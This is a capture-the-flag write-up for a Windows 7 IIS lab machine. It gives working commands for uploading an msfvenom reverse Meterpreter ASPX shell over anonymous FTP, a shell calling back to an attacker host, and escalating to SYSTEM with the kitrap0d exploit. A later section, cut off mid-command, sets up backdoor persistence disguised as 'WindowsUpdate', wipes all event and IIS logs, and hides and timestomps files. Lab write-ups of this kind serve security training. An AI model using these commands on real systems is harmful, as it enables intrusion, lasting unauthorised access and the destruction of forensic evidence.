Machine Synopsis#
IP Address: 10.10.10.5
Key Exploitation Techniques:
- Anonymous FTP Write Access: Exploiting an insecure FTP configuration to upload a web shell.
- ASPX Web Shell: Deploying a web shell to gain initial access.
- Windows Kernel Privilege Escalation: Using the `kitrap0d` exploit (MS10-015) to escalate from a low-privileged user to SYSTEM.
1. Enumeration#
Initial reconnaissance with `nmap` revealed two open ports; a service and script scan against them:

```
nmap -p 21,80 -sC -sV 10.10.10.5
```
Nmap Results:#
- Port 21 (FTP): `Microsoft ftpd`. The scan results show that anonymous login is allowed and that the server reports `Windows_NT`. The FTP root directory contains web files like `iisstart.htm`, which suggests it is the same directory as the web root.
- Port 80 (HTTP): `Microsoft IIS httpd 7.5`.
A manual check of the anonymous FTP access confirmed that we could not only read files but also upload and overwrite files, a critical finding.

```
ftp 10.10.10.5
# Login with 'anonymous' and any password.
ftp> put test.txt
# Upload successful.
```

The upload succeeded, and because the FTP root already holds the IIS default page `iisstart.htm`, the FTP directory is a writable web root. Requesting the test file over port 80 is the definitive check that the two paths are the same directory. Note that `put` silently overwrites an existing file of the same name, so pick a name that cannot collide with real site content.
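The check described above, written out as an added example that is not part of the original writeup: upload a randomly named canary over anonymous FTP, fetch the same name over HTTP, compare the bodies, and delete the canary afterwards. The target address is the one from the writeup; the assumption that the anonymous login lands directly in the web root (no subdirectory) is labelled in the code. The transports are passed in as functions so the decision logic can be exercised without a live host.

```python
"""Confirm that an anonymous-writable FTP root is also the IIS web root.

Added example, not from the original writeup. Uploads a random canary
over FTP, requests it over HTTP, compares, then deletes the canary.
"""
import ftplib
import io
import secrets
import urllib.error
import urllib.request

TARGET = "10.10.10.5"   # target from the writeup
# Assumption: the anonymous FTP login lands directly in the IIS web root,
# so the uploaded name maps to http://TARGET/<name> with no prefix.


def make_canary():
    """Random name and body so we never overwrite a real site file."""
    token = secrets.token_hex(8)
    return f"canary-{token}.txt", f"canary {token}\n".encode()


def check_writable_webroot(put, get, delete, name=None, body=None):
    """Return (is_writable_webroot, reason) using injected transports.

    put(name, body) -> bool          upload succeeded
    get(name)       -> bytes | None  HTTP body, None on 404 or error
    delete(name)    -> bool          cleanup succeeded
    """
    if name is None or body is None:
        name, body = make_canary()
    if not put(name, body):
        return False, "ftp upload failed: not writable"
    try:
        served = get(name)
    finally:
        delete(name)  # always try to remove the canary, even on error
    if served is None:
        return False, "upload ok but not served over http: not the web root"
    if served != body:
        return False, "served content differs: different directory or rewritten"
    return True, f"{name} uploaded via ftp and served via http: writable web root"


# Real transports for the target in the writeup.
def ftp_put(name, body):
    try:
        with ftplib.FTP(TARGET, timeout=10) as ftp:
            ftp.login("anonymous", "anonymous@example.com")
            ftp.storbinary(f"STOR {name}", io.BytesIO(body))
        return True
    except ftplib.all_errors:
        return False


def ftp_delete(name):
    try:
        with ftplib.FTP(TARGET, timeout=10) as ftp:
            ftp.login("anonymous", "anonymous@example.com")
            ftp.delete(name)
        return True
    except ftplib.all_errors:
        return False


def http_get(name):
    try:
        with urllib.request.urlopen(f"http://{TARGET}/{name}", timeout=10) as r:
            return r.read()
    except urllib.error.URLError:  # HTTPError (404 etc.) is a subclass
        return None


if __name__ == "__main__":
    ok, why = check_writable_webroot(ftp_put, http_get, ftp_delete)
    print(("[+] " if ok else "[-] ") + why)
```

Run it from the attacking host; the three outcomes (not writable, writable but not served, writable web root) are distinguished in the reason string, and the canary is removed in every case where the upload succeeded.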
2. Exploitation#
Step 2.1: Deploying a Web Shell#
The goal is to upload a malicious file (a web shell) that the web server will execute. Since the server is running IIS 7.5, the appropriate file type is an `.aspx` web shell: an `.aspx` file placed in the web root is compiled and executed by the ASP.NET handler, under the application pool's identity, the first time it is requested.

Using `msfvenom`, we generated an ASPX payload for a reverse Meterpreter shell.

```
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.2 LPORT=4444 -f aspx -o shell.aspx
```

Next, we uploaded the generated `shell.aspx` file to the server using the anonymous FTP connection.

```
ftp 10.10.10.5
ftp> put shell.aspx
```
Step 2.2: Gaining Initial Access#
We set up a multi-handler in Metasploit to listen for the incoming Meterpreter shell connection.

```
msfconsole -q
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 10.10.14.2
msf6 exploit(multi/handler) > set LPORT 4444
msf6 exploit(multi/handler) > exploit
```

To trigger the shell, we accessed the uploaded file via a web browser or `curl`.

```
curl http://10.10.10.5/shell.aspx
```

This executed the payload on the server, and a Meterpreter session was established. The `getuid` command confirmed we were running as `IIS APPPOOL\DefaultAppPool`. The `user.txt` flag was found on the `babis` user's desktop.

```
meterpreter > getuid
Server username: IIS APPPOOL\DefaultAppPool
meterpreter > shell
C:\Users\babis\Desktop> type user.txt
9ecdd6a3aedf24b41562fea70f4cb3e8
```
3. Privilege Escalation#
Our initial shell ran as the application pool identity, a low-privileged account. The next step was to escalate to `NT AUTHORITY\SYSTEM`.
Step 3.1: Information Gathering#
The `systeminfo` command provided crucial details: the OS is Windows 7 Enterprise, 32-bit (x86), build 7600 (the RTM build) with no hotfixes installed. An RTM build with no hotfixes is missing every kernel patch released since, and the architecture matters as much as the version: `kitrap0d` (MS10-015) is a bug in the 32-bit VDM subsystem and only applies to x86 Windows.

```
C:\Windows\system32> systeminfo
Host Name: DEVEL
OS Name: Microsoft Windows 7 Enterprise
OS Version: 6.1.7600 N/A Build 7600
System Type: X86-based PC
Hotfix(s): N/A
```
Step 3.2: Local Exploit Suggester#
The Metasploit `local_exploit_suggester` module automatically identifies potential privilege escalation exploits by running the `check` method of each local exploit module against the session's OS version, architecture and patch level.

```
meterpreter > run post/multi/recon/local_exploit_suggester
```

The suggester identified several likely candidates, including the `ms10_015_kitrap0d` exploit, which targets a kernel vulnerability that allows privilege escalation on unpatched 32-bit Windows 7 systems. The output is a list of candidates rather than a guarantee: each module's check is a heuristic, so try the best-matched module first and fall through to the next on failure.
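The reasoning the suggester automates, as an added example that is neither part of the original writeup nor Metasploit's own code: parse the `systeminfo` output shown above, then compare OS version, architecture and installed hotfixes against a small table of known local privilege-escalation bugs. The table is an illustrative subset chosen for this example (the KB number listed for each bulletin is the update that fixes it); the `SYSTEMINFO` constant is constructed from the values the writeup shows, and the `[01]: KBnnnnnnn` line format handled by the parser is how a real `systeminfo` lists installed hotfixes.

```python
"""Rank local privilege-escalation candidates from `systeminfo` output.

Added example, not from the original writeup and not Metasploit's
local_exploit_suggester. The candidate table is an illustrative subset.
"""
import re

# (name, fixing KB, min NT version, max NT version, affected architectures)
# NT versions: 5.1 = XP, 5.2 = 2003, 6.0 = Vista/2008, 6.1 = 7/2008 R2,
# 6.3 = 8.1/2012 R2, 10.0 = Windows 10.
CANDIDATES = [
    # kitrap0d lives in the 32-bit VDM subsystem, so x86 only
    ("MS10-015 kitrap0d (KB977165)", "KB977165", (5, 0), (6, 1), {"x86"}),
    ("MS15-051 win32k (KB3045171)", "KB3045171", (5, 2), (6, 3), {"x86", "x64"}),
    ("MS16-032 secondary logon (KB3139914)", "KB3139914", (6, 0), (10, 0), {"x86", "x64"}),
]

# Constructed from the values shown in the writeup's systeminfo output.
SYSTEMINFO = """\
Host Name:                 DEVEL
OS Name:                   Microsoft Windows 7 Enterprise
OS Version:                6.1.7600 N/A Build 7600
System Type:               X86-based PC
Hotfix(s):                 N/A
"""


def parse_systeminfo(text):
    """Extract ((major, minor), build, arch, installed KB set)."""
    m = re.search(r"^OS Version:\s*(\d+)\.(\d+)\.(\d+)", text, re.M)
    if not m:
        raise ValueError("no OS Version line in systeminfo output")
    version = (int(m.group(1)), int(m.group(2)))
    build = int(m.group(3))
    arch_m = re.search(r"^System Type:\s*(\S+)", text, re.M)
    arch = "x64" if arch_m and arch_m.group(1).lower().startswith("x64") else "x86"
    # A real systeminfo lists hotfixes one per line as "[01]: KB1234567";
    # collecting every KB token in the text covers that and the "N/A" case.
    hotfixes = set(re.findall(r"\bKB\d{6,7}\b", text))
    return version, build, arch, hotfixes


def suggest(text):
    """Return candidates whose fix is absent and whose OS/arch range matches."""
    version, _build, arch, hotfixes = parse_systeminfo(text)
    hits = []
    for name, kb, lo, hi, archs in CANDIDATES:
        if lo <= version <= hi and arch in archs and kb not in hotfixes:
            hits.append(name)
    return hits


if __name__ == "__main__":
    for hit in suggest(SYSTEMINFO):
        print("[*] candidate:", hit)
```

For the box above the x86 check is what keeps `kitrap0d` on the list; the same host reported as `x64-based PC`, or with KB977165 installed, drops it while the other candidates remain.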
Step 3.3: Exploiting with ms10_015_kitrap0d#
We backgrounded the current Meterpreter session and launched the `ms10_015_kitrap0d` exploit module against it (`sessions -l` shows the session ID to use; the first handler is still listening on 4444, so if the local exploit's payload clashes with it, set a different `LPORT`).

```
meterpreter > background
msf6 > use exploit/windows/local/ms10_015_kitrap0d
msf6 exploit(windows/local/ms10_015_kitrap0d) > set SESSION 1
msf6 exploit(windows/local/ms10_015_kitrap0d) > set LHOST 10.10.14.2
msf6 exploit(windows/local/ms10_015_kitrap0d) > exploit
```

The exploit successfully ran and created a new, privileged Meterpreter session. The `getuid` command confirmed `NT AUTHORITY\SYSTEM` privileges. The `root.txt` flag was found on the `Administrator` user's desktop.

```
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > shell
C:\Users\Administrator\Desktop> type root.txt
<redacted>
```
4. Alternative Exploitation Methods#
- Simple Web Shell: Instead of a full Meterpreter payload, a basic ASP.NET command shell (an `.aspx` page that passes a request parameter to `cmd.exe` and returns the output) could be used for initial access.
- PowerShell Reverse Shell: An ASPX wrapper could be used to launch a PowerShell reverse shell, which can be an effective alternative to a Meterpreter payload.
5. Post-Exploitation and Defense Evasion#
Once a `SYSTEM` shell is obtained, these steps are crucial for maintaining access and covering tracks. All three persistence mechanisms below write to locations defenders routinely audit (the Run keys, the task library and the service control manager), so each is a trade-off between reliability and stealth.
A. Persistence#
Registry Key: Add a value under `HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run` to execute a payload at every interactive logon (this fires when a user logs on, not at boot; the task and service below cover the boot case).

```
C:\Windows\system32> reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "WindowsUpdate" /t REG_SZ /d "C:\Windows\System32\backdoor.exe"
```

Scheduled Task: Create a new scheduled task that runs at system startup, ensuring a persistent presence.

```
C:\Windows\system32> schtasks /create /tn "WindowsUpdate" /tr "C:\Windows\System32\backdoor.exe" /sc onstart /ru SYSTEM
```

Service Installation: Create a new service that starts automatically at boot with `sc.exe`. The binary must be a real service executable that registers with the service control manager; a plain console payload will be killed when the SCM's start timeout expires.

```
C:\Windows\system32> sc create "WindowsUpdate" binpath= "C:\Windows\System32\backdoor.exe" start= auto
```
B. Defense Evasion#
Log Cleanup: Clear all Windows Event Logs and IIS logs to remove evidence of the intrusion. Clearing is itself logged: wiping the Security log writes event 1102 and wiping the System log writes event 104, both of which a monitored environment treats as high-severity alerts, so this step is noisy on any host with log forwarding.

```
C:\Windows\system32> for /f "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"
C:\Windows\system32> del "C:\inetpub\logs\LogFiles\W3SVC1\*.log"
```

File Attribute Manipulation: Hide the backdoor file and modify its timestamps to match a benign system file. Setting timestamps through `Get-Item` only changes the `$STANDARD_INFORMATION` timestamps; the `$FILE_NAME` timestamps in the MFT record keep the real creation time, which is what forensic timeline tools compare against.

```
C:\Windows\system32> attrib +h +s +r C:\Windows\System32\backdoor.exe
C:\Windows\system32> powershell "(Get-Item C:\Windows\System32\backdoor.exe).LastWriteTime = (Get-Item
```